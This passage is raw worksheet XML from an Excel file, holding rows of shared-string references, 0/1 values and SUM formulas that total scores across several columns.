      <c r="H18" s="12"/>
    </row>
    <row r="19" spans="1:8" s="17" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A19" s="16" t="s">
        <v>41</v>
      </c>
      <c r="D19" s="17">
        <f>SUM(D4:D18)</f>
        <v>9</v>
      </c>
      <c r="E19" s="17">
        <f t="shared" ref="E19:H19" si="0">SUM(E4:E18)</f>
        <v>9</v>
      </c>
      <c r="F19" s="17">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G19" s="17">
        <f t="shared" si="0"/>
        <v>11</v>
      </c>
      <c r="H19" s="17">
        <f t="shared" si="0"/>
        <v>9</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A22" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B22" s="25"/>
      <c r="C22" s="25"/>
      <c r="D22" s="25"/>
      <c r="E22" s="25"/>
      <c r="F22" s="25"/>
      <c r="G22" s="25"/>
      <c r="H22" s="25"/>
    </row>
    <row r="23" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A23" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B23" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C23" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D23" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E23" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F23" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G23" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H23" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="24" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D24">
        <v>1</v>
      </c>
      <c r="E24" s="20">
        <v>1</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D25">
        <v>1</v>
      </c>
      <c r="E25" s="20">
        <v>1</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G25">
        <v>1</v>
      </c>
      <c r="H25">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A26" s="27" t="s">
        <v>1029</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="D26">
        <v>1</v>
      </c>
      <c r="E26" s="20">
        <v>1</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A27" s="27"/>
      <c r="B27" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>1082</v>
      </c>
      <c r="D27">
        <v>1</v>
      </c>
      <c r="E27" s="20">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>1082</v>
      </c>
      <c r="G27">
        <v>1</v>
      </c>
      <c r="H27">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A28" s="27" t="s">
        <v>1158</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>61</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>1131</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28" s="20">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>1131</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A29" s="27"/>
      <c r="B29" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="D29">
        <v>1</v>
      </c>
      <c r="E29" s="20">
        <v>1</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="G29">
        <v>1</v>
      </c>
      <c r="H29">
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A30" s="3" t="s">
        <v>1142</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>1143</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>1316</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30" s="20">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>1172</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A31" s="27" t="s">
        <v>1144</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>1061</v>
      </c>
      <c r="C31" s="9" t="s">
        <v>1167</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31" s="20">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>1167</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A32" s="27"/>
      <c r="B32" s="3" t="s">
        <v>1159</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>1317</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32" s="20">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>1176</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>1145</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>1062</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>1093</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33" s="20">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>1092</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>1146</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>65</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>1165</v>
      </c>
      <c r="D34">
        <v>0</v>
      </c>
      <c r="E34" s="20">
        <v>0</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>1173</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34">
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>1147</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>1148</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>1318</v>
      </c>
      <c r="D35">
        <v>1</v>
      </c>
      <c r="E35" s="20">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>1174</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="27" t="s">
        <v>1149</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>1161</v>
      </c>
      <c r="C36" s="9" t="s">
        <v>1168</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36" s="20">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>1178</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A37" s="27"/>
      <c r="B37" s="3" t="s">
        <v>1160</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1177</v>
      </c>
      <c r="D37">
        <v>1</v>
      </c>
      <c r="E37" s="20">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1177</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A38" s="27" t="s">
        <v>1150</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>1163</v>
      </c>
      <c r="C38" s="9" t="s">
        <v>1169</v>
      </c>
      <c r="D38">
        <v>1</v>
      </c>
      <c r="E38" s="20">
        <v>1</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>1179</v>
      </c>
      <c r="G38">
        <v>1</v>
      </c>
      <c r="H38">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A39" s="27"/>
      <c r="B39" s="3" t="s">
        <v>1162</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>1319</v>
      </c>
      <c r="D39">
        <v>1</v>
      </c>
      <c r="E39" s="20">
        <v>0</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>1321</v>
      </c>
      <c r="G39">
        <v>1</v>
      </c>
      <c r="H39">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>1044</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="D40">
        <v>1</v>
      </c>
      <c r="E40" s="20">
        <v>1</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="G40">
        <v>1</v>
      </c>
      <c r="H40">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>1151</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>1152</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>1320</v>
      </c>
      <c r="D41">
        <v>1</v>
      </c>
      <c r="E41" s="20">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>1175</v>
      </c>
      <c r="G41">
        <v>1</v>
      </c>
      <c r="H41">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>1153</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>1154</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>1154</v>
      </c>
      <c r="D42">
        <v>1</v>
      </c>
      <c r="E42" s="20">
        <v>1</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>1154</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A43" s="27" t="s">
        <v>1155</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>1164</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>1171</v>
      </c>
      <c r="D43">
        <v>1</v>
      </c>
      <c r="E43" s="20">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>1171</v>
      </c>
      <c r="G43">
        <v>1</v>
      </c>
      <c r="H43">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A44" s="27"/>
      <c r="B44" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>1170</v>
      </c>
      <c r="D44">
        <v>0</v>
      </c>
      <c r="E44" s="20">
        <v>0</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>1141</v>
      </c>
      <c r="G44">
        <v>0</v>
      </c>
      <c r="H44">
        <v>0</v>
      </c>
    </row>
    <row r="45" spans="1:8" ht="183" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A45" s="3" t="s">
        <v>1156</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>1157</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>1166</v>
      </c>
      <c r="D45">
        <v>0</v>
      </c>
      <c r="E45" s="20">
        <v>0</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>1166</v>
      </c>
      <c r="G45">
        <v>0</v>
      </c>
      <c r="H45">
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A46" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D46" s="6">
        <f>SUM(D24:D45)</f>
        <v>19</v>
      </c>
      <c r="E46" s="6">
        <f t="shared" ref="E46:H46" si="1">SUM(E24:E45)</f>
        <v>18</v>
      </c>
      <c r="F46" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G46" s="6">
        <f t="shared" si="1"/>
        <v>20</v>
      </c>
      <c r="H46" s="6">
        <f t="shared" si="1"/>
        <v>18</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="9">
    <mergeCell ref="A38:A39"/>
    <mergeCell ref="A43:A44"/>
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A22:H22"/>
    <mergeCell ref="A26:A27"/>
    <mergeCell ref="A28:A29"/>
    <mergeCell ref="A31:A32"/>
    <mergeCell ref="A36:A37"/>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0DB0-0F2C-4A66-9364-75556FA57735}">
  <dimension ref="A1:M38"/>
  <sheetViews>
    <sheetView topLeftCell="A18" workbookViewId="0">
      <selection activeCell="F29" sqref="F29"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="39.21875" customWidth="1"/>
    <col min="2" max="2" width="27.88671875" customWidth="1"/>
    <col min="3" max="3" width="31.6640625" customWidth="1"/>
    <col min="4" max="4" width="12.44140625" customWidth="1"/>
    <col min="5" max="5" width="11" customWidth="1"/>
    <col min="6" max="6" width="23.109375" customWidth="1"/>
    <col min="7" max="7" width="10.44140625" customWidth="1"/>
    <col min="8" max="8" width="10.109375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" ht="36.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>177</v>
      </c>
      <c r="B1" s="30"/>
      <c r="C1" s="30"/>
      <c r="D1" s="30"/>
      <c r="E1" s="30"/>
      <c r="F1" s="30"/>
      <c r="G1" s="30"/>
      <c r="H1" s="30"/>
    </row>
    <row r="2" spans="1:13" ht="25.2" x14ac:dyDescent="0.25">
      <c r="A2" s="31" t="s">
        <v>0</v>
      </c>
      <c r="B2" s="31"/>
      <c r="C2" s="31"/>
      <c r="D2" s="31"/>
      <c r="E2" s="31"/>
      <c r="F2" s="31"/>
      <c r="G2" s="31"/>
      <c r="H2" s="31"/>
    </row>
    <row r="3" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A3" s="14" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="14" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="14" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="14" t="s">
        <v>5</v>
      </c>
      <c r="E3" s="14" t="s">
        <v>6</v>
      </c>
      <c r="F3" s="14" t="s">
        <v>4</v>
      </c>
      <c r="G3" s="14" t="s">
        <v>5</v>
      </c>
      <c r="H3" s="14" t="s">
        <v>6</v>
      </c>
      <c r="I3" s="3"/>
      <c r="J3" s="3"/>
      <c r="K3" s="3"/>
      <c r="L3" s="3"/>
      <c r="M3" s="3"/>
    </row>
    <row r="4" spans="1:13" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>175</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>24</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>146</v>
      </c>
      <c r="D4" s="3">
        <v>0</v>
      </c>
      <c r="E4" s="3">
        <v>0</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>24</v>
      </c>
      <c r="G4" s="3">
        <v>1</v>
      </c>
      <c r="H4" s="3">
        <v>1</v>
      </c>
      <c r="I4" s="3"/>
      <c r="J4" s="3"/>
      <c r="K4" s="3"/>
      <c r="L4" s="3"/>
      <c r="M4" s="3"/>
    </row>
    <row r="5" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>8</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="D5" s="3">
        <v>1</v>
      </c>
      <c r="E5" s="3">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="G5" s="3">
        <v>1</v>
      </c>
      <c r="H5" s="3">
        <v>1</v>
      </c>
      <c r="I5" s="3"/>
      <c r="J5" s="3"/>
      <c r="K5" s="3"/>
      <c r="L5" s="3"/>
      <c r="M5" s="3"/>
    </row>
    <row r="6" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>9</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="D6" s="3">
        <v>1</v>
      </c>
      <c r="E6" s="3">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="G6" s="3">
        <v>1</v>
      </c>
      <c r="H6" s="3">
        <v>1</v>
      </c>
      <c r="I6" s="3"/>
      <c r="J6" s="3"/>
      <c r="K6" s="3"/>
      <c r="L6" s="3"/>
      <c r="M6" s="3"/>
    </row>
    <row r="7" spans="1:13" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>168</v>
      </c>
      <c r="B7" s="3"/>
      <c r="C7" s="3"/>
      <c r="D7" s="3"/>
      <c r="E7" s="3"/>
      <c r="F7" s="3"/>
      <c r="G7" s="3"/>
      <c r="H7" s="3"/>
      <c r="I7" s="3"/>
      <c r="J7" s="3"/>
      <c r="K7" s="3"/>
      <c r="L7" s="3"/>
      <c r="M7" s="3"/>
    </row>
    <row r="8" spans="1:13" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>89</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>176</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>30</v>
      </c>
      <c r="D8" s="3">
        <v>1</v>
      </c>
      <c r="E8" s="3">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>30</v>
      </c>
      <c r="G8" s="3">
        <v>1</v>
      </c>
      <c r="H8" s="3">
        <v>1</v>
      </c>
      <c r="I8" s="3"/>
      <c r="J8" s="3"/>
      <c r="K8" s="3"/>
      <c r="L8" s="3"/>
      <c r="M8" s="3"/>
    </row>
    <row r="9" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>169</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>170</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>170</v>
      </c>
      <c r="D9" s="3">
        <v>1</v>
      </c>
      <c r="E9" s="3">
        <v>1</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>178</v>
      </c>
      <c r="G9" s="3">
        <v>1</v>
      </c>
      <c r="H9" s="3">
        <v>0</v>
      </c>
      <c r="I9" s="3"/>
      <c r="J9" s="3"/>
      <c r="K9" s="3"/>
      <c r="L9" s="3"/>
      <c r="M9" s="3"/>
    </row>
    <row r="10" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>82</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>37</v>
      </c>
      <c r="D10" s="3">
        <v>1</v>
      </c>
      <c r="E10" s="3">
        <v>1</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="G10" s="3">
        <v>1</v>
      </c>
      <c r="H10" s="3">
        <v>1</v>
      </c>
      <c r="I10" s="3"/>
      <c r="J10" s="3"/>
      <c r="K10" s="3"/>
      <c r="L10" s="3"/>
      <c r="M10" s="3"/>
    </row>
    <row r="11" spans="1:13" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>171</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>172</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>172</v>
      </c>
      <c r="D11" s="3">
        <v>1</v>
      </c>
      <c r="E11" s="3">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>172</v>
      </c>
      <c r="G11" s="3">
        <v>1</v>
      </c>
      <c r="H11" s="3">
        <v>1</v>
      </c>
      <c r="I11" s="3"/>
      <c r="J11" s="3"/>
      <c r="K11" s="3"/>
      <c r="L11" s="3"/>
      <c r="M11" s="3"/>
    </row>
    <row r="12" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>17</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D12" s="3">
        <v>1</v>
      </c>
      <c r="E12" s="3">
        <v>1</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G12" s="3">
        <v>1</v>
      </c>
      <c r="H12" s="3">
        <v>1</v>
      </c>
      <c r="I12" s="3"/>
      <c r="J12" s="3"/>
      <c r="K12" s="3"/>
      <c r="L12" s="3"/>
      <c r="M12" s="3"/>
    </row>
    <row r="13" spans="1:13" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>173</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>174</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>1322</v>
      </c>
      <c r="D13" s="3">
        <v>1</v>
      </c>
      <c r="E13" s="3">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>174</v>
      </c>
      <c r="G13" s="3">
        <v>1</v>
      </c>
      <c r="H13" s="3">
        <v>1</v>
      </c>
      <c r="I13" s="3"/>
      <c r="J13" s="3"/>
      <c r="K13" s="3"/>
      <c r="L13" s="3"/>
      <c r="M13" s="3"/>
    </row>
    <row r="14" spans="1:13" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>163</v>
      </c>
      <c r="B14" s="3"/>
      <c r="C14" s="3"/>
      <c r="D14" s="3"/>
      <c r="E14" s="3"/>
      <c r="F14" s="3"/>
      <c r="G14" s="3"/>
      <c r="H14" s="3"/>
      <c r="I14" s="3"/>
      <c r="J14" s="3"/>
      <c r="K14" s="3"/>
      <c r="L14" s="3"/>
      <c r="M14" s="3"/>
    </row>
    <row r="15" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>20</v>
      </c>
      <c r="B15" s="3"/>
      <c r="C15" s="3"/>
      <c r="D15" s="3"/>
      <c r="E15" s="3"/>
      <c r="F15" s="3"/>
      <c r="G15" s="3"/>
      <c r="H15" s="3"/>
      <c r="I15" s="3"/>
      <c r="J15" s="3"/>
      <c r="K15" s="3"/>
      <c r="L15" s="3"/>
      <c r="M15" s="3"/>
    </row>
    <row r="16" spans="1:13" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>21</v>
      </c>
      <c r="B16" s="3"/>
      <c r="D16" s="3"/>
      <c r="E16" s="3"/>
      <c r="G16" s="3"/>
      <c r="H16" s="3"/>
      <c r="I16" s="3"/>
      <c r="J16" s="3"/>
      <c r="K16" s="3"/>
      <c r="L16" s="3"/>
      <c r="M16" s="3"/>
    </row>
    <row r="17" spans="1:13" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A17" s="18" t="s">
        <v>41</v>
      </c>
      <c r="B17" s="18"/>
      <c r="C17" s="18"/>
      <c r="D17" s="18">
        <f>SUM(D4:D16)</f>
        <v>8</v>
      </c>
      <c r="E17" s="18">
        <f t="shared" ref="E17:H17" si="0">SUM(E4:E16)</f>
        <v>8</v>
      </c>
      <c r="F17" s="18">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G17" s="18">
        <f t="shared" si="0"/>
        <v>9</v>
      </c>
      <c r="H17" s="18">
        <f t="shared" si="0"/>
        <v>8</v>
      </c>
      <c r="I17" s="18"/>
      <c r="J17" s="18"/>
      <c r="K17" s="18"/>
      <c r="L17" s="18"/>
      <c r="M17" s="18"/>
    </row>
    <row r="18" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A18" s="3"/>
      <c r="B18" s="3"/>
      <c r="C18" s="3"/>
      <c r="D18" s="3"/>
      <c r="E18" s="3"/>
      <c r="F18" s="3"/>
      <c r="G18" s="3"/>
      <c r="H18" s="3"/>
      <c r="I18" s="3"/>
      <c r="J18" s="3"/>
      <c r="K18" s="3"/>
      <c r="L18" s="3"/>
      <c r="M18" s="3"/>
    </row>
    <row r="19" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A19" s="3"/>
      <c r="B19" s="3"/>
      <c r="C19" s="3"/>
      <c r="D19" s="3"/>
      <c r="E19" s="3"/>
      <c r="F19" s="3"/>
      <c r="G19" s="3"/>
      <c r="H19" s="3"/>
      <c r="I19" s="3"/>
      <c r="J19" s="3"/>
      <c r="K19" s="3"/>
      <c r="L19" s="3"/>
      <c r="M19" s="3"/>
    </row>
    <row r="20" spans="1:13" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A20" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B20" s="25"/>
      <c r="C20" s="25"/>
      <c r="D20" s="25"/>
      <c r="E20" s="25"/>
      <c r="F20" s="25"/>
      <c r="G20" s="25"/>
      <c r="H20" s="25"/>
      <c r="I20" s="3"/>
      <c r="J20" s="3"/>
      <c r="K20" s="3"/>
      <c r="L20" s="3"/>
      <c r="M20" s="3"/>
    </row>
    <row r="21" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A21" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B21" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C21" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D21" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E21" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F21" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G21" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H21" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="22" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D22">
        <v>1</v>
      </c>
      <c r="E22">
        <v>1</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G22">
        <v>1</v>
      </c>
      <c r="H22">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D23">
        <v>1</v>
      </c>
      <c r="E23">
        <v>1</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G23">
        <v>1</v>
      </c>
      <c r="H23">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A24" s="27" t="s">
        <v>1180</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="D24">
        <v>1</v>
      </c>
      <c r="E24">
        <v>1</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A25" s="27"/>
      <c r="B25" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="D25">
        <v>1</v>
      </c>
      <c r="E25">
        <v>1</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="G25">
        <v>1</v>
      </c>
      <c r="H25">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A26" s="27" t="s">
        <v>48</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>61</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>1131</v>
      </c>
      <c r="D26">
        <v>1</v>
      </c>
      <c r="E26">
        <v>1</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>1131</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A27" s="27"/>
      <c r="B27" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="D27">
        <v>1</v>
      </c>
      <c r="E27">
        <v>1</v>
      </c>
